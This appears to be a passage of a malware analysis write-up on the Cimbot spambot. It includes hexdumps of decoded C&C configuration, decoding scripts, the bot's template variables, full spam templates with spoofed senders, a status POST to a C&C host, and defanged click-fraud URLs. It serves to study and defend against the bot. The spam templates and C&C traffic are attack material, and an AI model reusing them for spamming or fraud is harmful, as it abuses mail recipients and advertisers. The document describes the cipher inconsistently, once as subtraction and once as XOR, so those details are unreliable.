00000330 52 20 31 2e 31 2e 34 33 32 32 29 07 00 5b 00 00 |R 1.1.4322)..[..|

00000340 00 5a 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 |.ZMozilla/5.0 (W|

00000350 69 6e 64 6f 77 73 3b 20 55 3b 20 57 69 6e 64 6f |indows; U; Windo|

00000360 77 73 20 4e 54 20 35 2e 31 3b 20 65 6e 2d 55 53 |ws NT 5.1; en-US|

00000370 3b 20 72 76 3a 31 2e 38 2e 30 2e 37 29 20 47 65 |; rv:1.8.0.7) Ge|

00000380 63 6b 6f 2f 32 30 30 36 30 39 30 39 20 46 69 72 |cko/20060909 Fir|

00000390 65 66 6f 78 2f 31 2e 35 2e 30 2e 37 07 00 5f 00 |efox/1.5.0.7.._.|

000003a0 00 00 5e 4d 6f 7a 69 6c 6c 61 2f 34 2e 30 20 28 |..^Mozilla/4.0 (|

000003b0 63 6f 6d 70 61 74 69 62 6c 65 3b 20 4d 53 49 45 |compatible; MSIE|

000003c0 20 36 2e 30 3b 20 57 69 6e 64 6f 77 73 20 4e 54 | 6.0; Windows NT|

000003d0 20 35 2e 31 3b 20 53 56 31 3b 20 2e 4e 45 54 20 | 5.1; SV1; .NET |

000003e0 43 4c 52 20 31 2e 31 2e 34 33 32 32 3b 20 2e 4e |CLR 1.1.4322; .N|

000003f0 45 54 20 43 4c 52 20 32 2e 30 2e 35 30 37 32 37 |ET CLR 2.0.50727|

00000400 29 07 00 33 00 00 00 32 4d 6f 7a 69 6c 6c 61 2f |)..3...2Mozilla/|

00000410 34 2e 30 20 28 63 6f 6d 70 61 74 69 62 6c 65 3b |4.0 (compatible;|

00000420 20 4d 53 49 45 20 36 2e 30 3b 20 57 69 6e 64 6f | MSIE 6.0; Windo|

00000430 77 73 20 4e 54 20 35 2e 31 29 07 00 57 00 00 00 |ws NT 5.1)..W...|

00000440 56 4d 6f 7a 69 6c 6c 61 2f 34 2e 30 20 28 63 6f |VMozilla/4.0 (co|

00000450 6d 70 61 74 69 62 6c 65 3b 20 4d 53 49 45 20 36 |mpatible; MSIE 6|

00000460 2e 30 3b 20 57 69 6e 64 6f 77 73 20 4e 54 20 35 |.0; Windows NT 5|

00000470 2e 31 3b 20 53 56 31 3b 20 2e 4e 45 54 20 43 4c |.1; SV1; .NET CL|

00000480 52 20 31 2e 31 2e 34 33 32 32 3b 20 49 6e 66 6f |R 1.1.4322; Info|

00000490 50 61 74 68 2e 31 29 08 00 03 00 00 00 02 65 6e |Path.1).......en|

000004a0 09 00 1d 00 00 00 1b 00 52 65 66 65 72 65 72 3a |........Referer:|

000004b0 20 68 74 74 70 3a 2f 2f 6c 65 6e 75 77 2e 63 6f | http://lenuw.co|

000004c0 6d 0d 0a 09 00 1b 00 00 00 19 00 52 65 66 65 72 |m..........Refer|

000004d0 65 72 3a 20 68 74 74 70 3a 2f 2f 64 65 76 61 77 |er: http://devaw|

000004e0 2e 63 6f 6d 09 00 1b 00 00 00 19 00 52 65 66 65 |.com........Refe|

000004f0 72 65 72 3a 20 68 74 74 70 3a 2f 2f 64 65 76 61 |rer: http://deva|

00000500 77 2e 63 6f 6d 09 00 1b 00 00 00 19 00 52 65 66 |w.com........Ref|

00000510 65 72 65 72 3a 20 68 74 74 70 3a 2f 2f 64 65 76 |erer: http://dev|

00000520 61 77 2e 63 6f 6d 09 00 1b 00 00 00 19 00 52 65 |aw.com........Re|

00000530 66 65 72 65 72 3a 20 68 74 74 70 3a 2f 2f 6c 65 |ferer: http://le|

00000540 6e 75 77 2e 63 6f 6d 09 00 1b 00 00 00 19 00 52 |nuw.com........R|

00000550 65 66 65 72 65 72 3a 20 68 74 74 70 3a 2f 2f 6c |eferer: http://l|

00000560 65 6e 75 77 2e 63 6f 6d 09 00 02 00 00 00 00 00 |enuw.com........|

00000570 09 00 02 00 00 00 00 00 09 00 02 00 00 00 00 00 |................|

*

00000860 0a 00 04 00 00 00 80 1a 06 00 0b 00 01 00 00 00 |................|

00000870 01 0c 00 01 00 00 00 01 0c 01 01 00 00 00 01 0c |................|

00000880 02 01 00 00 00 02 0c 03 01 00 00 00 04 0c 04 01 |................|

00000890 00 00 00 03 0c 05 01 00 00 00 05 0c 06 01 00 00 |................|

000008a0 00 05 0c 07 01 00 00 00 05 0c 08 01 00 00 00 05 |................|

000008b0 0c 09 01 00 00 00 05 0d 00 01 00 00 00 01 0e 00 |................|

000008c0 04 00 00 00 50 c3 00 00 0f 00 01 00 00 00 01 11 |....P...........|

000008d0 00 28 00 00 00 26 00 2f 5e 28 5b 61 2d 7a 30 2d |.(...&./^([a-z0-|

000008e0 39 5c 2d 5d 7b 31 2c 32 34 7d 29 5c 2e 28 5b 61 |9\-]{1,24})\.([a|

000008f0 2d 7a 5c 2e 5d 7b 32 2c 37 7d 29 24 2f 11 00 3c |-z\.]{2,7})$/..<|

00000900 00 00 00 3a 00 2f 5e 28 5b 61 2d 7a 30 2d 39 5c |...:./^([a-z0-9\|

00000910 2e 5d 7b 31 2c 33 30 7d 29 5c 2e 28 5b 61 2d 7a |.]{1,30})\.([a-z|

00000920 30 2d 39 5c 2d 5d 7b 31 2c 32 34 7d 29 5c 2e 28 |0-9\-]{1,24})\.(|

00000930 5b 61 2d 7a 5c 2e 5d 7b 32 2c 37 7d 29 24 2f 12 |[a-z\.]{2,7})$/.|

00000940 00 47 00 00 00 45 00 2f 28 61 62 75 73 65 29 7c |.G...E./(abuse)||

00000950 28 61 64 6d 69 6e 29 7c 28 77 65 62 6d 61 73 74 |(admin)|(webmast|

00000960 65 72 29 7c 28 70 6f 73 74 6d 61 73 74 65 72 29 |er)|(postmaster)|

00000970 7c 28 68 65 6c 70 29 7c 28 68 6f 73 74 6d 61 73 ||(help)|(hostmas|

00000980 74 65 72 29 7c 28 73 70 61 6d 29 2f 13 00 04 00 |ter)|(spam)/....|

00000990 00 00 88 13 01 00 21 00 01 00 00 00 01 21 01 01 |......!......!..|

000009a0 00 00 00 01 21 02 01 00 00 00 02 21 03 01 00 00 |....!......!....|

000009b0 00 1e 21 04 01 00 00 00 06 21 05 01 00 00 00 07 |..!......!......|

000009c0 21 06 01 00 00 00 08 21 07 01 00 00 00 09 21 08 |!......!......!.|

000009d0 01 00 00 00 0a 21 09 01 00 00 00 0f 22 00 05 00 |.....!......"...|

000009e0 00 00 04 25 4d 46 25 23 00 01 00 00 00 01 24 00 |...%MF%#......$.|

000009f0 05 00 00 00 04 25 48 4e 25 25 00 02 00 00 00 64 |.....%HN%%.....d|

00000a00 00 26 00 04 00 00 00 30 75 00 00 27 00 08 00 00 |.&.....0u..'....|

00000a10 00 e0 93 04 00 a0 bb 0d 00 0f 22 00 00 00 1c 00 |..........".....|

00000a20 25 52 41 4e 44 5f 4c 5f 34 5f 38 25 2e 66 61 6b |%RAND_L_4_8%.fak|

00000a30 65 65 78 61 6d 70 6c 65 2e 63 6f 6d 0a 0b 0c 0d |eexample.com....|

00000a40 0a 01 00 00 00 03 20 06 00 00 00 5b d4 41 5e bb |...... ....[.A^.|

00000a50 01 |.|

00000a51
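As an added example (not code from the original post), here is the column-by-column analysis from the Personal Exposition section in Python, taken one step further than the post: with the period fixed at 16, the key is recovered from the ciphertext alone as the most common byte in each column, assuming (as the decoded dump suggests) that 0x00 is the most common plaintext byte. The sample plaintext is constructed; the final check decodes the first 96 bytes of the real fake GIF above against the decoded rows above.

```python
"""Ciphertext-only look at Cimbot's 16-byte subtraction cipher.

Added example (not code from the original post). It reproduces the
per-column statistics described under "Personal Exposition", then goes one
step beyond the post: with the period known, the key is simply the most
common ciphertext byte in each column, assuming (as the decoded dump
suggests) that 0x00 is the most common plaintext byte. The sample plaintext
is constructed here; the final check decodes the first 96 bytes of the real
fake GIF from the post's hexdump.
"""
from collections import Counter

KEY = bytes.fromhex("C63B220838F11B0F8A09E9A317C1E487")  # first 16 bytes of the bot id (from the post)
SKIP = 15  # bytes the bot leaves untouched at the front of the buffer


def decode(cipher, key=KEY, skip=SKIP):
    """sub_403635 in Python: byte i of the body has key[i % 16] subtracted."""
    body = ((b - key[i % len(key)]) & 0xFF for i, b in enumerate(cipher[skip:]))
    return bytes(cipher[:skip]) + bytes(body)


def encode(plain, key=KEY, skip=SKIP):
    """The C&C side of the same scheme: byte-wise addition mod 256."""
    body = ((b + key[i % len(key)]) & 0xFF for i, b in enumerate(plain[skip:]))
    return bytes(plain[:skip]) + bytes(body)


def columns(data, period, skip=SKIP):
    """Every period-th byte of the enciphered body, as `period` columns."""
    body = data[skip:]
    return [body[i::period] for i in range(period)]


def mean_distinct(data, period):
    """Mean number of distinct byte values per column for a candidate period.
    At the true period each column is plaintext plus a constant, so the count
    is bounded by the plaintext alphabet; wrong periods mix shifts and spread."""
    cols = columns(data, period)
    return sum(len(set(c)) for c in cols) / len(cols)


def recover_key(cipher, period=16):
    """Per-column mode: key byte + the most common plaintext byte (0x00 here)."""
    return bytes(Counter(c).most_common(1)[0][0] for c in columns(cipher, period))


def build_sample_plaintext():
    """Constructed stand-in for the decoded config: a GIF89a header, then
    zero-padded, length-prefixed records holding regex-like strings, and a
    long zero run like the one in the post's dump."""
    records = [b"/href\\s*=\\s*(.*?)/i", b"/(sid=[a-f0-9]*)/i",
               b"Referer: http://example.invalid\r\n",
               b"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
               b"%RAND_L_4_8%.example.invalid"]
    out = bytearray(b"GIF89a" + bytes(9))  # 15 bytes that stay in the clear
    for rep in range(12):
        for kind, text in enumerate(records):
            text += b"#%d" % rep  # keep repeats from being byte-identical
            out += bytes([kind]) + len(text).to_bytes(4, "little") + text + bytes(8)
    out += bytes(512)
    return bytes(out)


# First six rows of the fake GIF and of the decoded result, copied from the post's hexdumps.
FAKE_GIF_HEAD = bytes.fromhex(
    "47494638396103b2058926c25f9936ca" "48261238f1dc0a2a09e9a317c1e487e6"
    "3b220838f15b0f8a09e9a358c1e887c6" "3ba2f66ef15d0f8b09e9a31a04e48bc6"
    "3b226822f11b538a0de9a317e1a389c6" "3c223738f11b358a3851157c2740faf0")
DECODED_HEAD = bytes.fromhex(
    "47494638396103b2058926c25f993604" "0d040a0000c1fba00000000000000020"
    "00000000004000000000004100040000" "0080ee36004200010000000343000400"
    "000060ea000044000400000020bf0200" "01002f00000026002f687265665c732a")


def demo():
    """Return (distinct-per-column stats, recovered key, round-trip ok)."""
    plain = build_sample_plaintext()
    cipher = encode(plain)
    stats = {p: round(mean_distinct(cipher, p), 1) for p in (8, 15, 16, 17, 32)}
    key = recover_key(cipher)
    return stats, key, decode(cipher, key) == plain


if __name__ == "__main__":
    stats, key, ok = demo()
    print("mean distinct bytes per column by period:", stats)  # 16 (and 32) stand out
    print("recovered key:", key.hex(), "(matches)" if key == KEY else "(differs)")
    print("round trip on constructed data:", ok)
    print("real sample rows decode as in the post:", decode(FAKE_GIF_HEAD) == DECODED_HEAD)
```

Multiples of the true period (32, 48, ...) look just as good by this measure, so take the smallest period that stands out.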

I'm not completely certain yet, but I think this is either performing Referer spamming, or crawling the web collecting email addresses, or both. The regular expressions are for filtering out certain file types and mailboxes while it harvests. I'm guessing it picks the User-Agents at random or in sequence or something. I can find out if anyone cares. Googling for lenuw.com and devaw.com is left as an exercise for the reader.

I've replaced the source IP address of my lab machine with 10.11.12.13 (0x0a, 0x0b, 0x0c, 0x0d), and the reverse DNS name with fakeexample.com. (It's right at the very end of the hexdump.) This is of course used by the bot to determine its own IP address when it's behind a NAT.

The %WHATEVERS% are the mail-merge template variables that get filled in with appropriate values while sending spam. From examination of the Cimbot binary itself, these are all of the possible variables:

aRand_di_       db '%RAND_DI_',0        ; DATA XREF: sub_4070BB:loc_407E27↑o

aRand_lu_ db '%RAND_LU_',0 ; DATA XREF: sub_4070BB:loc_407CE0↑o

aRand_ldu_ db '%RAND_LDU_',0 ; DATA XREF: sub_4070BB:loc_407B99↑o

aRand_ld_ db '%RAND_LD_',0 ; DATA XREF: sub_4070BB:loc_407A52↑o

aRand_d_ db '%RAND_D_',0 ; DATA XREF: sub_4070BB:loc_40790B↑o

aRand_l_ db '%RAND_L_',0 ; DATA XREF: sub_4070BB:loc_4077C6↑o

aRand_char_ldu db '%RAND_CHAR_LDU%',0 ; DATA XREF: sub_4070BB:loc_407603↑o

aRand_char_lu db '%RAND_CHAR_LU%',0 ; DATA XREF: sub_4070BB:loc_4075A1↑o

aRand_char_ld db '%RAND_CHAR_LD%',0 ; DATA XREF: sub_4070BB:loc_40753F↑o

aRand_char_u db '%RAND_CHAR_U%',0 ; DATA XREF: sub_4070BB:loc_4074DD↑o

aRand_char_d db '%RAND_CHAR_D%',0 ; DATA XREF: sub_4070BB:loc_40747B↑o

aRand_char_l db '%RAND_CHAR_L%',0 ; DATA XREF: sub_4070BB:loc_40741B↑o

aRand_num db '%RAND_NUM%',0 ; DATA XREF: sub_4070BB:loc_4073A3↑o

aRand_guid db '%RAND_GUID%',0 ; DATA XREF: sub_4070BB:loc_407317↑o

aUnix_time db '%UNIX_TIME%',0 ; DATA XREF: sub_4070BB+33↑o

aOe db '%OE%',0 ; DATA XREF: sub_4090B6+8D2↑o

aDm db '%DM%',0 ; DATA XREF: sub_4090B6+81E↑o

aHs db '%HS%',0 ; DATA XREF: sub_4090B6+7EB↑o

aRc db '%RC%',0 ; DATA XREF: sub_4090B6+7DC↑o

aMf db '%MF%',0 ; DATA XREF: sub_4090B6+7CD↑o

aBi db '%BI%',0 ; DATA XREF: sub_4090B6+2CD↑o

aMp db '%MP%',0 ; DATA XREF: sub_4090B6+2BE↑o

aMh db '%MH%',0 ; DATA XREF: sub_4090B6+2AF↑o

aHn db '%HN%',0 ; DATA XREF: sub_4090B6+274↑o

aIp db '%IP%',0 ; DATA XREF: sub_4090B6+223↑o

Second Example

These are some of the decoded spam templates from the original .pcap I received. One of the strings is like this:

Date: %UNIX_TIME% +0000

From: "Roeber Grossmann" <%MF%>

X-Mailer: The Bat! (3.62.11) Professional

Reply-To: Roeber Grossmann <%MF%>

X-Priority: 3 (Normal)

Message-ID: <1739770208.20090227075335@baberuth.com>

To: <%RC%>

Subject: More orgasmms

MIME-Version: 1.0

Content-Type: multipart/alternative;

boundary="----------5BA0A36C8AFBFE"

------------5BA0A36C8AFBFE

Content-Type: text/plain; charset=iso-8859-1

Content-Transfer-Encoding: quoted-printable

New Orgasm Enhancer

=09 =20

=09

Decades. There are schools in which the averages a troop

of monkeys ran chattering away and parrots of a better amusement

i sat on the roof to watch i was for some time his private

secretary, and at home in the evenings, he said. If not,

my servant.

------------5BA0A36C8AFBFE

Content-Type: text/html; charset=iso-8859-1

Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">=20

<html>

<head>

<title> </title> =20

<META http-equiv=3DContent-Type content=3D"text/html; charset=3D"iso-8859-1=

">=20

</head>

<body> <strong>

</strong><br><span name=3D"#wqqq"></span>New Orgasm Enhancer<br><br>Click=

=20

<a href=3D"http://cid-afbafcf33f10f80d.spaces.live.com/blog/cns!AFBAFCF33F1=

0F80D!107.entry">HERE</a><br><strong></strong><p><br></p><br>

<p><a name=3D"#qwww">

</a>Decades. There are schools in which the averages a troop<br> of monkeys=

ran chattering away and parrots of a better amusement<br> i sat on the roo=

f to watch i was for some time his private<br> secretary, and at home in th=

e evenings, he said. If not,<br> my servant.</p></body></html>

------------5BA0A36C8AFBFE--

Another string looks like this; I think it's the %MF% (MAIL FROM) value:

domesticity@baberuth.com

Here's another, almost identical one:

The %MF% in this case is orthodontic@psnelling.co.uk. The server has already done the work of generating an appropriate Message-ID (half of it is the current date and time), and of filling in most of the message with Markov-chain-generated Bayesian-filter-poisoning text.

From: "Valladores Malys" <%MF%>

X-Mailer: The Bat! (3.5.29) Professional

Reply-To: Valladores Malys <%MF%>

X-Priority: 3 (Normal)

Message-ID: <6465125974.20090227075649@psnelling.co.uk>

To: <%RC%>

Subject: More oorgasms

MIME-Version: 1.0

Content-Type: multipart/alternative;

boundary="----------BF59A1A8555AD2"

------------BF59A1A8555AD2

Content-Type: text/plain; charset=iso-8859-1

Content-Transfer-Encoding: quoted-printable

New Orgasm Enhanceer

=09

Moment in the cafe with maria, paredes, and the of sutasoma

as also all his quivers. Bowless, i wish to the devil i

had shared your room with they glowed on shirt bosoms and

morning as well it in the name of the sovereignty of massachusetts,.

------------BF59A1A8555AD2

Content-Type: text/html; charset=iso-8859-1

Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> =20

<html>

<head> <title> </title> =20

<META http-equiv=3DContent-Type content=3D"text/html; charset=3D"iso-8859-1=

"> =20

</head> =20

<body> <strong> </strong><br><br>New Orgasm Enhanceer<br><b> </b>Click=

=20

<a href=3D"http://cid-a66afb2a221a9923.spaces.live.com/blog/cns!A66AFB2A221=

A9923!106.entry">HERE</a><br><span>=09</span><p><br></p><b>=09</b>

<p><b> </b>Moment in the cafe with maria, paredes, and the of sutasoma<br=

>

as also all his quivers. Bowless, i wish to the devil i<br>

had shared your room with they glowed on shirt bosoms and<br>

morning as well it in the name of the sovereignty of massachusetts,.</p></b=

ody></html>

------------BF59A1A8555AD2--

There's one of these every 182 seconds (roughly three minutes). All of the From lines are spoofed:

Message-ID                                      MAIL FROM string
<6001459618.20090227085953@influencemag.ca>     checking@influencemag.ca
<9730083908.20090227090253@schindelar.cz>       cerro@schindelar.cz
<1455429741.20090227170249@danatec.com>         inosculate@danatec.com
<9435482259.20090227170557@4lifetech.com>       jealousy@4lifetech.com
<3624447656.20090227170909@math.usc.edu>        misroute@math.usc.edu
<5001423059.20090227171217@oelhauser.ch>        sorters@oelhauser.ch
<5576779480.20090227171533@mulemusic.no>        enflames@mulemusic.no
<4990128715.20090227171833@isphording.de>       triumph@isphording.de
<8370838722.20090227172137@heltreidar.com>      mineworker@heltreidar.com
<4380821286.20090227172445@ton-fabrik.de>       sneezeweed@ton-fabrik.de
<1429782066.20090227172801@rhpresence.fr>       machinizes@rhpresence.fr
<4640089897.20090227173105@backfire.co.uk>      shoed@backfire.co.uk
<5239254299.20090227173413@tsv-hochdahl.de>     sinistral@tsv-hochdahl.de
<2726249263.20090227173721@applewise.co.jp>     animally@applewise.co.jp
<8024786915.20090227174337@leak-pro.com>        precatory@leak-pro.com
<2495183162.20090227174642@lyprodan.com>        racemises@lyprodan.com
<2410127594.20090227174946@7acres.com.au>       colonist@7acres.com.au
<1101937854.20090227175306@encore21.net>        excreter@encore21.net
<7294082901.20090227182630@gyep.com>            jumbling@gyep.com
<4650255037.20090227182934@am-auto.cz>          downwardness@am-auto.cz
<3289686325.20090227183238@kleine-wege.de>      ostensory@kleine-wege.de
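
Two things in that table are worth checking mechanically rather than by eye: the MAIL FROM domain always matches the Message-ID domain, so a naive header-consistency check passes and does not catch the spoofing, and the timestamps inside the Message-IDs show the steady cadence at which the server hands out templates. The script below is an added example, not code from the post or from Cimbot; the rows are copied from the table above, the 182-second figure is the post's, and the +/-20 second tolerance is a demo assumption.

```python
"""Added example (not from the original post): parse the Message-IDs in
Cimbot's spam templates, confirm the MAIL FROM domain matches them, and
measure the interval between consecutive templates.  Rows are copied from
the post's table; the expected period (182 s) is the post's figure and the
tolerance is an assumption for the demo."""
import re
from datetime import datetime
from statistics import median

# <10-digit nonce>.<YYYYMMDDHHMMSS>@<domain>, the shape seen in the templates
MSGID_RE = re.compile(r"^<(\d{10})\.(\d{14})@([^@>\s]+)>$")

SAMPLE_ROWS = [  # (Message-ID, MAIL FROM), copied from the table above
    ("<1455429741.20090227170249@danatec.com>", "inosculate@danatec.com"),
    ("<9435482259.20090227170557@4lifetech.com>", "jealousy@4lifetech.com"),
    ("<3624447656.20090227170909@math.usc.edu>", "misroute@math.usc.edu"),
    ("<5001423059.20090227171217@oelhauser.ch>", "sorters@oelhauser.ch"),
    ("<5576779480.20090227171533@mulemusic.no>", "enflames@mulemusic.no"),
    ("<4990128715.20090227171833@isphording.de>", "triumph@isphording.de"),
    ("<8370838722.20090227172137@heltreidar.com>", "mineworker@heltreidar.com"),
    ("<4380821286.20090227172445@ton-fabrik.de>", "sneezeweed@ton-fabrik.de"),
]


def parse_message_id(msgid: str):
    """Return (nonce, datetime, domain), or None if the shape doesn't match."""
    m = MSGID_RE.match(msgid.strip())
    if not m:
        return None
    nonce, stamp, domain = m.groups()
    try:
        when = datetime.strptime(stamp, "%Y%m%d%H%M%S")
    except ValueError:          # fourteen digits that are not a real timestamp
        return None
    return nonce, when, domain.lower()


def sender_domain_matches(msgid: str, mail_from: str) -> bool:
    """True when the MAIL FROM domain equals the Message-ID domain.

    For Cimbot this is always True: the spoofed sender and the generated
    Message-ID are built from the same domain, so this check alone is no
    detection."""
    parsed = parse_message_id(msgid)
    if parsed is None or "@" not in mail_from:
        return False
    return mail_from.rsplit("@", 1)[1].lower() == parsed[2]


def intervals_seconds(rows):
    """Seconds between consecutive template timestamps, in table order."""
    stamps = []
    for msgid, _ in rows:
        parsed = parse_message_id(msgid)
        if parsed is not None:
            stamps.append(parsed[1])
    return [int((b - a).total_seconds()) for a, b in zip(stamps, stamps[1:])]


def cadence_summary(rows, expected: int = 182, tolerance: int = 20) -> dict:
    """Median interval and the share of intervals near the expected poll period."""
    ivs = intervals_seconds(rows)
    near = sum(1 for i in ivs if abs(i - expected) <= tolerance)
    return {
        "intervals": ivs,
        "median": median(ivs) if ivs else None,
        "share_near_expected": near / len(ivs) if ivs else 0.0,
    }


if __name__ == "__main__":
    print(all(sender_domain_matches(m, f) for m, f in SAMPLE_ROWS))
    print(cadence_summary(SAMPLE_ROWS))
```

On these eight rows every sender domain matches and the intervals cluster around three minutes (median 188 seconds), which is the template-generation cadence seen from the server side, not the bot's own sending rate.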

Other Stuff

I should also note that the bot reports its status back up to the C&C server via an HTTP POST of another fake GIF. There isn't much more to say about it: the body is XOR'd with the same key as above, and most of the plaintext in this example is NULLs, which is why the same bytes repeat through the dump:

POST /account/p.php HTTP/1.1

Host: sufujilisi.info

Accept: */*

Content-Length: 97

Connection: close

Cookie: PHPSESSID=47d3066a386f5532af8a1d69c46c4896

00000000 47 49 46 38 39 61 f4 02 fe 01 21 bb ef b9 0f c8 |GIF89a....!.....|

00000010 40 4b 08 38 f1 1e 0f 8a 09 e9 83 55 79 2d 87 c6 |@K.8.......Uy-..|

00000020 3b 22 08 38 f1 1b 0f 8a 09 e9 a9 17 c1 e4 87 c6 |;".8............|

00000030 3b 22 08 38 f1 1b 0f 8a 09 e9 a3 17 c1 e4 8a e4 |;".8............|

00000040 3b 22 08 38 f1 1b 0f 8a 09 e9 a3 17 c1 e4 87 c6 |;".8............|

00000050 3b 22 08 38 f1 1b 0f 8a 09 0a |;".8......|

0000005a
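
Since NULL XOR k is k, a record that is mostly NULLs is a known-plaintext gift: the key bytes sit in the ciphertext, and the repeating 16-byte run in the dump above is exactly that. The script below is an added example, not the bot's code or the post's: it frames a constructed status record behind a fake GIF89a header with a constructed 16-byte key (the real key is not printed anywhere on this page), recovers the key from a region known to be NULLs, decodes, and sanity-checks the result. It assumes the key phase continues across the six-byte header (the repeats above line up on 16-byte boundaries of the whole blob, which suggests this, but it is an assumption to verify against a sample).

```python
"""Added example, not Cimbot's own code: decode a repeating-key XOR blob
hidden behind a fake GIF89a header, recovering the key from a region of
the record known to be NULL.  Key, plaintext and record layout are all
constructed for the demo.  Assumption: the key phase is counted from
offset 0 of the blob, header included."""

GIF_MAGIC = b"GIF89a"
KEY_LEN = 16                    # period hypothesised from column statistics
# Constructed 16-byte key for the demo (NOT the bot's key).
DEMO_KEY = bytes.fromhex("9f1c7a3e55d2b04c81e6f30d2a97c5bb")
# Constructed fixed-size status record: short text, rest of the buffer NUL.
DEMO_PLAINTEXT = b"BOTID=0001;OS=WinXP" + b"\x00" * 61


def xor_repeating(data: bytes, key: bytes, phase: int = 0) -> bytes:
    """XOR data against key repeated; phase is the key index used for data[0]."""
    return bytes(b ^ key[(i + phase) % len(key)] for i, b in enumerate(data))


def frame_as_gif(plaintext: bytes, key: bytes) -> bytes:
    """Build a blob the way the post describes: GIF89a magic, then XORed body.
    The key phase continues across the header (assumption, see lead-in)."""
    return GIF_MAGIC + xor_repeating(plaintext, key, phase=len(GIF_MAGIC))


def split_frame(blob: bytes) -> bytes:
    """Drop the fake GIF header and return the enciphered body."""
    if not blob.startswith(GIF_MAGIC):
        raise ValueError("not a GIF89a-framed blob")
    return blob[len(GIF_MAGIC):]


def column_distinct_counts(ct: bytes, period: int) -> list:
    """Distinct byte values in each column of the ciphertext taken every
    `period` bytes.  For the right period and text-like plaintext each
    column is plaintext XOR one constant, so it looks like text, not noise."""
    return [len(set(ct[c::period])) for c in range(period)]


def recover_key_from_nulls(ct: bytes, null_start: int, null_end: int,
                           key_len: int, phase: int) -> bytes:
    """Known-plaintext recovery: where the plaintext is 0x00, the
    ciphertext byte *is* the key byte for that position."""
    key = [None] * key_len
    for i in range(null_start, null_end):
        key[(i + phase) % key_len] = ct[i]
    if any(k is None for k in key):
        raise ValueError("NUL region too short to cover every key position")
    return bytes(key)


def printable_ratio(data: bytes) -> float:
    """Sanity check for a candidate decode: share of printable ASCII/whitespace."""
    if not data:
        return 0.0
    ok = sum(1 for b in data if 0x20 <= b < 0x7F or b in b"\r\n\t")
    return ok / len(data)


def decode_blob(blob: bytes, key: bytes) -> bytes:
    """Strip the fake header and XOR the body back to plaintext."""
    return xor_repeating(split_frame(blob), key, phase=len(GIF_MAGIC))


def demo() -> dict:
    blob = frame_as_gif(DEMO_PLAINTEXT, DEMO_KEY)
    body = split_frame(blob)
    # The analyst knows (from the binary, or from the long repeating run in
    # the dump) that bytes 19..79 of the record are NUL; 61 bytes cover all
    # 16 key positions.
    key = recover_key_from_nulls(body, 19, len(body), KEY_LEN, len(GIF_MAGIC))
    plain = decode_blob(blob, key).rstrip(b"\x00")
    return {
        "key": key,
        "plaintext": plain,
        "printable": printable_ratio(plain),
        "columns": column_distinct_counts(body, KEY_LEN),
    }


if __name__ == "__main__":
    r = demo()
    print(r["key"].hex(), r["plaintext"], r["printable"], r["columns"])
```

If the recovered key decodes the downloaded templates to readable quoted-printable MIME, the phase assumption was right; if the output is printable only in bursts, shift the phase by the header length and try again.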

Every fifty minutes, Cimbot makes HTTP requests to affiliate click sites like this one (note that there is no User-Agent header):

GET /index.php?ref=24364 HTTP/1.1

Host: www.paid2link.com

Accept: */*

Connection: close

And this is the complete list of affiliate URLs, "s/http/hxxp/g"-ified mostly to prevent any more clicks on them by web-crawling machines.

hxxp://lecoquin.net/pages/index.php?refid=ec0lag

hxxp://www.paidclickings.com/default.asp?id=ec0lag

hxxp://www.dhcp-i386.biz/?ref=4912

hxxp://uniqwork.com/rjoin.asp?id=ec0lag

hxxp://www.ladyteapot.com/?refer=852

hxxp://www.dailypayouts.com/?ref=2130

hxxp://www.hotrusclick.com/signup.php?r=15293

hxxp://www.lionclix.com/index.php?ref=ec0lag

hxxp://www.megacashclicks.net/index.php?ref=ec0lag

hxxp://leapcash.com/signUp.php?ref=1945777

hxxp://www.birthdayclubptc.com/?r=ec0lag

hxxp://www.loo-promo.org/index.php?ref=381

hxxp://www.yep.com/Search2.aspx?keyword=exchange&agentID=321

hxxp://www.paid2link.com/index.php?ref=24364

hxxp://www.theadclick.com/pages/index.php?refid=ec0lag

hxxp://www.stormpay.com/?2523754

hxxp://www.joomcash.com/pages/index.php?refid=ec0lag

hxxp://www.onlineearningcenter.com/members/ec0lag

hxxp://www.carolina-clicks.com/pages/index.php?refid=ec0lag

hxxp://sb-money.com/monitor.php?kind=1&lang=0&user=352

hxxp://www.ruspromotion.net/site/index.php?ref=ec0lag

hxxp://www.kesefkal.net/ru/?refer=ec0lag

hxxp://getpaideventoday.com/index.php?i=1&ref=ec0lag

hxxp://www.clixnclix.net/index.php?ref=ec0lag

hxxp://www.TheGoldClick.Com/index.asp?ref=43256

hxxp://sunclicks.com/cgi-bin/reg.cgi?refid=ec0lag

hxxp://www.surfing4cash.info/index.php?ref=ec0lag

hxxp://www.trafficdinar.com/signup.php?r=5326

hxxp://www.egcash.com/index.php?refid=ec0lag

hxxp://leapcash.com/signUp.php?ref=ec0lag

hxxp://resource-a-day.net/member/index.cgi?tj42

hxxp://a.websponsors.com/c/s=16356/c=24323/

hxxp://www.alladvantage.com/go.asp?refid=ec0lag

Summary

Spamming, Email Harvesting, and Click Fraud about sums this up.

None of this is really new, except for the fake GIF headers on the C&C

communications.


Julia Wolf @ FireEye Malware Intelligence Lab

Questions/Comments to research [@] fireeye [.] com